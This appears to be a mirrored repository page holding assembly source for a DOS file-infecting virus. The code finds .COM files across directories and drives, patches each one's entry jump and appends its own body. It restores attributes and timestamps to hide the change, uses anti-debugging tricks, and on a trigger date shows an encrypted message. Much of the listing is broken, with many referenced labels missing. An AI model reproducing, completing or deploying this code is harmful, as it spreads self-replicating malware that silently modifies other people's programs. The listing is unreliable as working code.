mirror of
synced 2024-12-18 17:36:11 +00:00
503 lines
16 KiB
503 lines
16 KiB
db 24h,21h,0e9h,0,0 ;first byte = jmp far, second byte = how much bytes to jump
;later here comes the host_program
start_2: ;here starts the virus
CALL delta ;get delta offset
delta: ;
pop bp ;
sub bp,offset delta ;
mov cx,09ebh
mov ax,0fe05h
jmp $-2
add ah,03bh
jmp $-10
mov ax,3503h ;save int 3h in bx
int 21h ;do it
mov ah,25h ;set new int 3h...
mov dx,offset new_int_3 ;...to new_int_3
int 21h ;do it
xchg bx,dx ;exchange bx,dx (restore original int 3h)
int 21h ;do it
mov ax,0f9f2h
add ax,10h
mov dx,5935h
add dx,10h
mov bl,10h
sub bl,10h
int 16h
mov byte ptr[bp+drive],0
call get_cur_drive
cmp al,0
jne go_on_5
mov byte ptr[bp+drive],1
mov dl,2h
call set_cur_drive
mov dl,00h
lea si,[bp+offset cur_dir]
call get_cur_dir
mov di,100h ;restore original 3 bytes of the host_prog. to 100h
lea si,[bp+original_three] ;from where (original_three)
mov cx,5 ;3 bytes
rep movsb ;copy 'em to 100h
lea dx,[bp+offset new_dta] ;offset of new DTA
call set_new_dta ;set new DTA
lea dx,[bp+offset file] ;file_spec (*.COM)
mov cx,0007h ;all attributes
CALL find_first ;find_first
jc no_more_filez_in_dir
jmp go_on ;jump to go_on
find_next_2: ;find_next file
CALL find_next ;and find_next
jnc go_on ;no more filez -> restore
lea dx,[bp+offset dot_dot]
call chdir
cmp al,3
jne go_on_4
call restore
call find_first_again
go_on: ;go to here after the first_file is found
lea si,[bp+offset new_dta+15h] ;save(get) DTA information (begin with the attribs)
mov cx,9 ;9 bytes to copy
lea di,[bp+offset f_attr] ;file_attribs -> file_time -> file_date -> file_size
rep movsb ;save em (copy em)
xor cx,cx
lea dx,[bp+offset new_dta+1eh]
call set_file_attributes
cmp dword ptr[bp+file_size],200
jnb size_ok_1
xor ch,ch
mov cl,byte ptr[bp+f_attr]
lea dx,[bp+offset new_dta+1eh]
call set_file_attributes
jmp find_next_2
cmp dword ptr[bp+file_size],60000
jna size_ok_2
xor ch,ch
mov cl,byte ptr[bp+f_attr]
lea dx,[bp+offset new_dta+1eh]
call set_file_attributes
jmp find_next_2
mov al,02h ;open file for read & write
lea dx,[bp+offset new_dta+1eh] ;file_name in DTA
CALL open ;open it
mov bx,ax ;move file_handler in bx
CALL infect ;now infect it!!!
nop ;without this nop the infected prog will crash. i don't know why?!?
mov dx,word ptr[bp+f_date]
mov cx,word ptr[bp+f_time]
call set_file_time_date
call close
xor ch,ch
mov cl,byte ptr[bp+f_attr]
lea dx,[bp+offset new_dta+1eh]
call set_file_attributes
add word ptr[bp+counter],1
cmp word ptr[bp+counter],3
je restore
call find_next_2
restore: ;restore old DTA and run normal program
call restore_old_dta ;restore DTA
lea dx,[bp+offset dot_dot]
call chdir
cmp al,3h
jne dir_loop
lea dx,[bp+offset cur_dir]
call chdir
cmp byte ptr[bp+drive],1
jne go_on_6
mov dl,00h
call set_cur_drive
call get_system_date
cmp dh,4
jne not_the_right_day
cmp al,0
jne not_the_right_day
lea si,[bp+offset message]
mov cx,offset message_ende-offset message
call crypt
lea dx,[bp+offset message]
call write_string
call wait_for_key
mov di,100h ;jump to 100h. the original three bytes have already been restored.
jmp di ;jump too 100h
;these are the rutines that can be 'called'
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;INFECTION RUTINE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infect: ;to infect the file :-)
lea dx,[bp+original_three] ;save the first 3 bytes in original_three
mov cx,5 ;3 bytes
CALL read ;read em
call already_infected ;already infected ???
jne go_on_2
call close
xor ch,ch
mov cl,byte ptr[bp+f_attr]
lea dx,[bp+offset new_dta+1eh]
call set_file_attributes
call find_next_2 ;yes, find_next file
cmp word ptr[bp+original_three],'MZ'
je go_on_3
cmp word ptr[bp+original_three],'ZM'
je go_on_3
CALL seek_to_begin ;seek to beginning of the file
CALL calculate_new_jump ;calculate the new jump(first 3 bytes)
mov cx,5 ;write 3 bytes
lea dx,[bp+new_jump] ;from new calculated jump
CALL write ;write
CALL seek_to_end ;go to end of file
mov ax,word ptr[bp+counter]
push ax
mov word ptr[bp+counter],0000h
mov cx,ende_start_2-start_2 ;write virussize -3 bytes
lea dx,[bp+start_2] ;from label start_2
CALL write ;write
pop ax
mov word ptr[bp+counter],ax
ret ;and return
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;READ RUTINE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
read: ;read bytes from file
mov ah,3fh ;function read
int 21h ;read
ret ;return
seek_to_end: ;seek to end of file
mov ax,4202h ;function seek to end
xor cx,cx
xor dx,dx
int 21h ;seek
ret ;return
seek_to_begin: ;seek to begin of file
mov ax,4200h ;function seek to begin
xor cx,cx
xor dx,dx
int 21h ;seek
ret ;return
calculate_new_jump: ;calculates the new jump
mov byte ptr[bp+new_jump],24h
mov byte ptr[bp+new_jump+1],21h
mov byte ptr[bp+new_jump+2],0e9h ;= jmp far
mov ax,word ptr[bp+file_size] ;2nd + 3rd byte = file_size...
sub ax,5 ;...-3
mov word ptr[bp+new_jump+3],ax ;put these 3 bytes in new_jump
ret ;return
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;WRITE RUTINE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
write: ;write bytes to file
mov ah,40h ;function write
int 21h ;write
ret ;return
close: ;close a file
mov ah,3eh ;function close
int 21h ;close
ret ;return
open: ;open a file
mov ah,3dh ;function open
int 21h ;open
ret ;return
set_file_time_date: ;sets the files date & time
mov ax,5701h ;function set date & time
int 21h ;set date & time
ret ;return
find_first: ;find first file
mov ah,4eh ;function find_first
int 21h ;find_first
ret ;return
find_next: ;find_next file
mov ah,4fh ;function find_next
int 21h ;find_next
ret ;return
set_new_dta: ;sets the data transfer address (DTA)
mov ah,1ah ;function set DTA
int 21h ;set DTA
ret ;return
restore_old_dta: ;restores the old DTA
mov ah,1ah ;function set DTA
mov dx,80h ;where old DTA was located
int 21h ;set DTA
ret ;return
set_file_attributes: ;sets the file attributes
mov ax,4301h ;function set file attributes
int 21h ;set file attribs
ret ;return
already_infected: ;checks if the file is already infected
mov ax,dword ptr[bp+file_size] ;mov ax,file_size
sub ax,(ende_start_2-start_2)+5 ;sub ax,virus_size
cmp word ptr[bp+offset original_three+3],ax ;if the first bytes are the same its already infected
ret ;return
mov di,si
xor al,byte ptr[bp+crypt_val]
loop xor_loop
mov ah,3bh
int 21h
mov ah,19h
int 21h
mov ah,0eh
int 21h
mov ah,47h
int 21h
mov ah,2ah
int 21h
mov ah,9h
int 21h
mov ah,00h
int 21h
new_dta db 43 dup(?) ;new DTA (43 BYTES)
f_attr db ? ;file attributes
f_time dw ? ;file time
f_date dw ? ;file date
file_size dd ? ;file size
file db'*.COM',0 ;all com filez
original_three db 0cdh,20h,0,1,2 ;first three bytes of infected prog
new_jump db 5 dup(?) ;to calculate the new jump (3 bytes)
counter dw ?
crypt_val db 123
db 40, 14, 21, 41, 18, 8, 30, 91, 12, 9, 18, 15, 15, 30, 21, 91, 25, 2, 91, 40, 11, 20, 20, 16, 2, 85, 91, 58, 14, 8, 15, 9, 18, 26, 91, 74, 66, 66, 77, 85, 113, 118, 95
dot_dot db '..',0
cur_dir db 64 dup(?)
drive db ?
jmp $
ende_start_2: ;END VIRUS